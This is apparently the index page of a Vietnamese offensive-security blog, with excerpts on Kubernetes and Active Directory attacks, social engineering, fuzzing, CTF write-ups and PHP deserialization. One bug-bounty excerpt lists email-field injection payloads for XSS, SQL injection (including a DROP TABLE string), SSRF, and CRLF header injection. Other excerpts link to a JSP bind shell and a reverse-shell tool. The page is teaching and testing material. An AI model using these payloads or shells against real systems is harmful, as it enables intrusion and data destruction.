Các câu lệnh phục vụ certpinning
Trích xuất Hash Public Key Câu lệnh lấy hash public key từ một web domain: Câu lệnh lấy hash public key từ một chứng chỉ trong file pem: Trích xuất SHA-256 FINGERPRINT Câu lệnh lấy SHA-256 fingerprint từ một web domain: Câu lệnh lấy SHA-256 fingerprint từ một chứng chỉ trong file pem:
Đọc tiếp
Cách đăng ký ChatGPT OpenAI tại Việt Nam
Xin chào mọi người, gần đây có một website được nhiều người quan tâm của OpenAI là ChatGPT, nó rất thú vị và có khả năng thay thế Stack Overflow. Tuy nhiên, hiện chỉ có 156 quốc gia được đăng kí sử dụng (trừ Việt Nam). Mình sẽ giúp các bạn đăng kí dễ dàng…
Đọc tiếp
Tấn công các cụm Kubernetes qua lỗi API Kubelet misconfigure
Giới thiệu Kubelet là một agent trong từng node, có tác dụng quản lý tất cả container. Kubelet được giám sát, điều khiển bởi Control plane (hay còn gọi là Master), dùng để quản lý các node và các pod trong cluster. Ôn lại các kiến thức của Kubernetes, ta sẽ có một số khái…
Đọc tiếp
Pentest/Redteam Active Directory (AD)
Sr ảnh bìa to hơn ảnh chính :v anh em ấn vào ảnh dưới đây rồi phóng to nhé.
Đọc tiếp
![Tấn công Social Engineering toàn tập [part 2]](https://truongtn.files.wordpress.com/2022/12/social-engineering-attacks-1.jpg?w=600&h=800&crop=1)
Tấn công Social Engineering toàn tập [part 2]
Phân loại Social Engineering Social Engineering có thể được chia thành hai loại phổ biến: Human-Based Social Engineering Human-based là kỹ thuật Social Engineering liên quan đến sự tương tác giữa con người với con người để thu được thông tin mong muốn. Ví dụ như chúng ta phải gọi điện thoại đến phòng Help…
Đọc tiếp
Tấn công Social Engineering toàn tập [part 1]
Giới thiệu Trên thế giới, khi nói về vấn đề bảo mật thông tin, người ta không thể không nói đến Social Engineering – một kỹ thuật khai thác thông tin rất nguy hiểm, khó phát hiện, phòng chống và gây thiệt hại to lớn cho công tác bảo mật thông tin. Ngày nay, công…
Đọc tiếp
base64 payload encoded JSP bind Shell
https://github.com/truongtn/jsp-shell Throw server.jsp to target server. Use client.py to send commands.
Đọc tiếp
FUZZING VỚI AFL
Giới thiệu American Fuzzy Lop, được viết tắt là AFL là một công cụ kiểm thử mờ thông minh. Được dùng để tìm các lỗ hổng phần mềm bằng cách gửi dữ liệu đầu vào có định đạng sai tới ứng dụng. Nếu phần mềm crash hoặc hoạt động không đúng dự kiến, nó có…
Đọc tiếp
![[Write-Up] – KCSC CTF (WEB)](https://truongtn.files.wordpress.com/2022/12/image-6.webp?w=300&h=400&crop=1)
[Write-Up] – KCSC CTF (WEB)
1. ROBOT 2. Warm Up 3. D I O R 4. Magic PHP 5. Baby SQL Tham khảo:
Đọc tiếp
PHP Object Injection a.k.a PHP Insecure Deserialization
Ở PHP lổ hổng deserialization còn được gọi là PHP object injection. Để có thể hiểu về vấn đề này, trước tiên ta phải biết PHP serialize và deserialize một đối tượng như thế nào.PHP có 2 hàm là serialize() và unserialize() đảm nhận 2 nhiệm vụ này. Ví dụ serialize object User: Kết quả…
Đọc tiếp
![[Bug Bounty]Một số payload khi test trường email](https://truongtn.files.wordpress.com/2022/10/ff-miuuuaiaton.jpg?w=300&h=400&crop=1)
[Bug Bounty]Một số payload khi test trường email
Chép lại cho các ông copy nhé, nhất các ông :v XSStest+(alert(0))@example.comtest@example(alert(0)).com”alert(0)”@example.comTemplate injection”<%=7*7%>”@example.comtest+(${{7*7}})@example.comSQLi”‘OR1=1–‘”@example.com”mail’);DROP TABLE users;–“@example.comSSRFjohn.doe@abc123.burpcollaborator.netjohn.doe@[127.0.0.1]Parameter pollutionvictim&email=attacker@example.com(Email) Header injection”%0d%0aContent-Length:%200%0d%0a%0d%0a”@example.com”recicpient@test.com>\r\nRCPT TO:<victim+”@test.com
Đọc tiếp
Reverseshell-Powercat-v2
Con hàng backconnect cơ bản, dùng khá okela, khá mượt. Link download: Muốn biến powershell thành exe thì dùng: Lưu ý: máy chủ C&C phải mở hai port.
Đọc tiếp
Loading…
Something went wrong. Please refresh the page and/or try again.
Thông Tin 0day:
Thông Tin từ Exchange Team:
- An Toàn Thông Tin Cơ Bản (4)
- Android (2)
- Code standard (3)
- Cryptography (4)
- CTF (17)
- CVE (6)
- Hacking & RED TEAM (40)
- Azure (2)
- Buffer Over Flow (1)
- Bug Bounty (2)
- Common attacks (9)
- Local Attack (3)
- Pentest Mobile Application (1)
- Redteam verctors (2)
- XSS (3)
- installation & implementation (5)
- Malware (2)
- nhattruong.blog (8)
- Photo (1)
- Pwnable (3)
- Security Solutions (5)
- Security Tools (11)
android security An toàn thông tin kỷ niệm 70 năm thành lập ngành Ngân hàng Việt Nam app security backconnect bash buffer overflow CTF CVE CVE-2019-18935 CVE-2021-26084 CVE-2021-44228 Cơ Sở An Toàn Thông Tin deserialization docker dynamic loader frida frida-server frida gadget frida server frida trace gumjs Hide and seek hà nội LearnPress MB MBBANK pentest phishing phố đi bộ pwn python RCE redteam rsa social engineering SQL injection Teachers Record Management System 1.0 telerik UI truongtn VSEC vulnerability WaTF-Bank wordpress write up XXS
About
Nhat Truong Blog 